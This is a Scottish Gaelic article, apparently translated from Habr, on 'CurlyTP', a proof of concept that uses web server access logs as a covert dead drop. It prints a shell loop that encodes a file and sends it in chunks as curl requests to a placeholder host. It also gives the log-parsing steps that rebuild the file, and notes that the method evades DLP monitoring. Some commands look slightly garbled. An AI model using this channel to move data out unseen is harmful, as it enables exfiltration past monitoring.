A rèir mìneachadh Wikipedia, tha tuiteam marbh na inneal co-fheall a bhios a ’dèanamh iomlaid air fiosrachadh no cuid de nithean eadar daoine a’ cleachdadh àite dìomhair. Is e am beachd nach bi daoine a’ coinneachadh - ach bidh iad fhathast ag iomlaid fiosrachaidh gus sàbhailteachd obrachaidh a chumail suas.

Cha bu chòir don àite falaich aire a tharraing. Mar sin, anns an t-saoghal far-loidhne bidh iad gu tric a’ cleachdadh rudan falaichte: breige sgaoilte sa bhalla, leabhar leabharlainn, no lag ann an craobh.

Tha mòran innealan crioptachaidh agus gun urra air an eadar-lìn, ach tha an fhìrinn mu bhith a’ cleachdadh nan innealan sin a’ tarraing aire. A bharrachd air an sin, faodaidh iad a bhith air am bacadh aig ìre corporra no riaghaltais. Dè a nì thu?

Mhol an leasaiche Ryan Flowers roghainn inntinneach - cleachd frithealaiche lìn sam bith mar àite falaich. Ma smaoinicheas tu mu dheidhinn, dè a bhios frithealaiche lìn a’ dèanamh? A’ faighinn iarrtasan, a’ cur a-mach faidhlichean agus a’ sgrìobhadh logaichean. Agus bidh e a’ clàradh gach iarrtas, eadhon feadhainn ceàrr!

Tha e a 'tionndadh a-mach gu bheil frithealaiche lìn sam bith a' leigeil leat cha mhòr teachdaireachd sam bith a shàbhaladh sa log. Bha flùraichean a 'faighneachd ciamar a chleachdar seo.

Tha e a’ tabhann an roghainn seo:

1. Gabh faidhle teacsa (teachdaireachd dìomhair) agus obraich a-mach an hash (md5sum).
2. Bidh sinn ga chòdachadh (gzip + uuencode).
3. Bidh sinn a’ sgrìobhadh chun loga a’ cleachdadh iarrtas a tha ceàrr a dh’aona ghnothach chun an fhrithealaiche.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Gus faidhle a leughadh, feumaidh tu na h-obraichean sin a dhèanamh ann an òrdugh cùil: dì-chòdachadh agus unzip am faidhle, thoir sùil air an hash (faodar an hash a ghluasad gu sàbhailte thairis air seanalan fosgailte).

Tha àiteachan air an cur nan àite =+=gus nach bi beàrnan anns an t-seòladh. Bidh am prògram, ris an can an t-ùghdar CurlyTP, a’ cleachdadh còdachadh base64, leithid ceanglachan post-d. Tha an t-iarrtas air a dhèanamh le prìomh fhacal ?transfer?gus am faigh an neach a gheibh e gu furasta e anns na logaichean.

Dè a chì sinn anns na clàran sa chùis seo?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Mar a chaidh ainmeachadh roimhe, gus teachdaireachd dhìomhair fhaighinn feumaidh tu na h-obraichean a choileanadh ann an òrdugh cùil:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Tha am pròiseas furasta a dhèanamh fèin-ghluasadach. Tha md5sum a’ maidseadh, agus tha susbaint an fhaidhle a’ dearbhadh gun deach a h-uile càil a chòdachadh gu ceart.

Tha an dòigh-obrach gu math sìmplidh. “Is e adhbhar na h-eacarsaich seo dìreach dearbhadh gun gabh faidhlichean a ghluasad tro iarrtasan lìn beaga neo-chiontach, agus bidh e ag obair air frithealaiche lìn sam bith le logaichean teacsa sìmplidh. Gu bunaiteach, tha a h-uile frithealaiche lìn na àite falaich! ” sgrìobh Flowers.

Gu dearbh, chan obraich an dòigh ach ma tha cothrom aig an neach a gheibh e air logaichean frithealaiche. Ach tha an leithid de ruigsinneachd air a thoirt seachad, mar eisimpleir, le mòran de luchd-aoigheachd.

Ciamar a chleachdadh?

Tha Ryan Flowers ag ràdh nach e eòlaiche tèarainteachd fiosrachaidh a th’ ann agus nach cuir e ri chèile liosta de chleachdaidhean a dh’ fhaodadh a bhith ann airson CurlyTP. Dha, tha e dìreach na dhearbhadh air bun-bheachd gum faodar na h-innealan eòlach a chì sinn a h-uile latha a chleachdadh ann an dòigh neo-ghnàthach.

Gu dearbh, tha grunn bhuannachdan aig an dòigh seo thairis air “falaich” frithealaiche eile mar Digital Dead Drop no Bogsa spùinneadair: chan fheum e rèiteachadh sònraichte air taobh an fhrithealaiche no protocolaidhean sònraichte sam bith - agus cha tog e amharas am measg an fheadhainn a bhios a’ cumail sùil air an trafaic. Chan eil e coltach gun dèan siostam SORM no DLP sganadh URLan airson faidhlichean teacsa teann.

Is e seo aon de na dòighean air teachdaireachdan a chuir tro fhaidhlichean seirbheis. Faodaidh tu cuimhneachadh mar a b’ àbhaist do chuid de chompanaidhean adhartach a bhith a’ suidheachadh Obraichean leasaiche ann an cinn HTTP no ann an còd duilleagan HTML.

B’ e am beachd nach biodh ach luchd-leasachaidh lìn a’ faicinn an ugh Càisge seo, leis nach biodh neach àbhaisteach a’ coimhead air cinn-cinn no còd HTML.

Source: www.habr.com